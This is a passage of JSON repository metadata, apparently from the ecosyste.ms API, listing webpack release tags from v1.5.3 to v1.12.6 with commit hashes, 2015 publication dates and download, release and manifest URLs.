:null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.e